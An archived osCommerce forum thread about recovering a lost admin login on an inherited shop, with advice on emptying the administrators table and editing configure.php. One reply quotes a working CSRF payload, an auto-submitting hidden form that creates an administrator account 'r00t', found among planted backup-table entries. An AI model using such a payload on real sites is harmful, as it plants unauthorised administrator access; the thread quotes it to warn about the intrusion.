Jump to content

Archived

This topic is now archived and is closed to further replies.

esm

Lost admin access info

Recommended Posts

Hi,

 

I have taken over a screwed up website with an osCommerce shopping cart. The original designer has vanshed and with him the admin login info. Is there any way to recover this info somewhere?

 

Thanks,

 

Ed

Share this post


Link to post
Share on other sites

Hi,

 

I have taken over a screwed up website with an osCommerce shopping cart. The original designer has vanshed and with him the admin login info. Is there any way to recover this info somewhere?

 

Thanks,

 

Ed

 

which version of oscommerce application?


Please read this line: Do you want to find all the answers to your questions? click here. As for contribution database it's located here!

8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself.

Before installing contribution or editing/updating/deleting any files, do the full backup, it will save to you & everyone here on the forum time to fix your issues.

Any issues with oscommerce, I am here to help you.

Share this post


Link to post
Share on other sites

Hi,

 

I have taken over a screwed up website with an osCommerce shopping cart. The original designer has vanshed and with him the admin login info. Is there any way to recover this info somewhere?

 

Thanks,

 

Ed

 

If it is an old version you will have to change the password in the .htaccess file in the admin directory.

 

If it is a new version you will have to reset it from the database. Here is an useful video:

 

http://www.clubosc.com/forgotten-your-admin-password-shock-horror.html

Share this post


Link to post
Share on other sites

To change passwords that pop up before the shop admin is even displayed is via the file manager and permissions in your web hosting admin pages.

 

If you have a login on your OS Commerce admin page you can either delete all the administrators in the data base or install one of forgotten password add-ons.

 

Failing that google

 

site:forums.oscommerce.com lost password

 

or

 

site:forums.oscommerce.com forgotten password

 

HTH

 

G


Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Share this post


Link to post
Share on other sites

The version is 2.2.RC1.

 

Is this considered an old version or a new one?

 

Thanks,

 

Ed

Share this post


Link to post
Share on other sites

Guys,

 

Here's an update:

 

I accessed php/myAdmin and emptied the administrator table.

 

Then I created a new administrator but when I attempt to login with the new user name/password, I get an "invalid attempt" error message. Looking into the administrator table again, I see the encrypted password but the user name field is blank.

 

What am I doing wrong here?

 

Thanks,

 

Ed

Share this post


Link to post
Share on other sites

Empty the table completely then go to your "admin" login you should be presented with a page telling you there are no administrators and inviting you to name a user and password


Currently...:

 

Working with osCommerce 2.3.1

Now working with Phoenix

Add-Ons so far Installed:

Not all of these installed yet on Phoenix - some are and the rest will be

 

Add date and order number to invoice and packing slip,

Products Cycle Slideshow,

Detailed Monthly Sales,

Holiday Settings,

Tracking Module for 2.3

Share this post


Link to post
Share on other sites

What did you write in the password field???

 

Leave it empty or place a known string, from a site you know the password...


Providing Ecommerce & CRM Solutions since 1995

Vote my post up if you found it usefull

Share this post


Link to post
Share on other sites

Why would I leave the password field empty?

 

When I create an administrator, it needs a password, right?

 

Checking the administrator table, the password (encrypted) is there but no user name.

 

On another note, I checked the admin bak table and there are over a dozen entries. Can they be deleted?

Share this post


Link to post
Share on other sites

Well you should leave it empty so you can login and then put another one....

 

Complete the table with a username...

 

Regarding the dozen entries in the backup table, well, thats a hack.....

<form method="post" action="http://127.0.0.1/oscommerce/admin/administrators.php?action=insert">
<input type=hidden name="username" value="r00t" />
<input type=hidden name="password" value="r00ted" />
<input type=hidden name="x" value="16" />
<input type=hidden name="y" value="13" />
</form>
<script>document.getElementsByTagName("form")[0].submit();</script>

 

So, Esm, if you didnt load them, delete them for sure... they constitute the entry for the hacker/s who planted them...

 

But really, with NO intention of making a client from you, what is your Security status regarding your site??

 

Did you run the patches yet? Change the admin directory an so on??


Providing Ecommerce & CRM Solutions since 1995

Vote my post up if you found it usefull

Share this post


Link to post
Share on other sites

Okay, here's what I did, according to your instructions:

 

I emptied the bak table.

 

I emptied the administrator table.

 

Then I tried to create an administrator: I entered a user name, left the pw field blank and hit enter. Then I tried to login withe the new user name and entered a password. Result: Invalid login.

 

What in the world am I doing wrong here?

 

Thanks for your assistance, I really appreciate that.

 

Ed

Share this post


Link to post
Share on other sites

Can you check on the admin/.htaccess content pls?


Providing Ecommerce & CRM Solutions since 1995

Vote my post up if you found it usefull

Share this post


Link to post
Share on other sites

Here's the content of the admin/.htaccess file:

 

# $Id: $

#

# This is used with Apache WebServers

#

# For this to work, you must include the parameter 'Options' to

# the AllowOverride configuration

#

# Example:

#

# <Directory "/usr/local/apache/htdocs">

# AllowOverride Options

# </Directory>

#

# 'All' with also work. (This configuration is in the

# apache/conf/httpd.conf file)

 

# The following makes adjustments to the SSL protocol for Internet

# Explorer browsers

 

#<IfModule mod_setenvif.c>

# <IfDefine SSL>

# SetEnvIf User-Agent ".*MSIE.*" \

# nokeepalive ssl-unclean-shutdown \

# downgrade-1.0 force-response-1.0

# </IfDefine>

#</IfModule>

 

# If Search Engine Friendly URLs do not work, try enabling the

# following Apache configuration parameter

 

# AcceptPathInfo On

 

# Fix certain PHP values

# (commented out by default to prevent errors occuring on certain

# servers)

 

# php_value session.use_trans_sid 0

# php_value register_globals 1

Share this post


Link to post
Share on other sites

If the qwery doesnt work, will have to asume that the files inside your admin are corrupted....

 

Do you have a clean copy around to upload?


Providing Ecommerce & CRM Solutions since 1995

Vote my post up if you found it usefull

Share this post


Link to post
Share on other sites

Bryce,

 

Ran the query exactly how you described but it didn't work. I can set up a new administrator but when I try to login after that, it's invalid.

 

When I "browse" the administrators table I see a hash in the password field but the user name field is blank. For some reason the user name is not entered into the administrators table.

 

As to a clean copy, my customer had purchased an osC template years ago from Template Monster. He's buying the same template for a more recent osC version for loading up.

 

Would that solve this problem?

 

Thanks for all the help.

 

Ed

Share this post


Link to post
Share on other sites

Can you give us the error information on the query?

 

What about Droping the table in a first query and then trying to create it again with the provided data (without the if exists lines... )


Providing Ecommerce & CRM Solutions since 1995

Vote my post up if you found it usefull

Share this post


Link to post
Share on other sites

There is NO error message on the query. The query works fine.

 

The creation of the first administrator does not work correctly. I enter a user name and a password and the administrator is created. After that, when I try to log in for the first time, I get an invalid login attempt message. When I check the administrators table, I see a hash for the password but the user name field is blank. The user name is not entered into the administrators table. That seems to be the problem.

Share this post


Link to post
Share on other sites

There is NO error message on the query. The query works fine.

 

The creation of the first administrator does not work correctly. I enter a user name and a password and the administrator is created. After that, when I try to log in for the first time, I get an invalid login attempt message. When I check the administrators table, I see a hash for the password but the user name field is blank. The user name is not entered into the administrators table. That seems to be the problem.

 

weird, have you tried to edit the username in phpmyadmin. seems the post information got lost during the creation of the account. :blink:

Share this post


Link to post
Share on other sites

Yes, I did open the admin table and entered the user name manually. Same result, invalid login attempt.

Share this post


Link to post
Share on other sites

How does "uploading a new admin" sounds to you?

 

Do you mind giving a temp URL to take a look?


Providing Ecommerce & CRM Solutions since 1995

Vote my post up if you found it usefull

Share this post


Link to post
Share on other sites

I posted a solution to this last night, purely following the advice of Mike Taylor.

 

 

Try this

 

HTH

 

G


Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Share this post


Link to post
Share on other sites

When I tried to enter the changes in the admin/configuration.php, those 3 "define" lines are not even in there. I did a search for that string and it's definitely not in that file. This drives me nuts! :-(

Share this post


Link to post
Share on other sites

You're hunting rabbits and it's duck season.

:blink:

 

Look in /admin/includes/configure.php


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites

×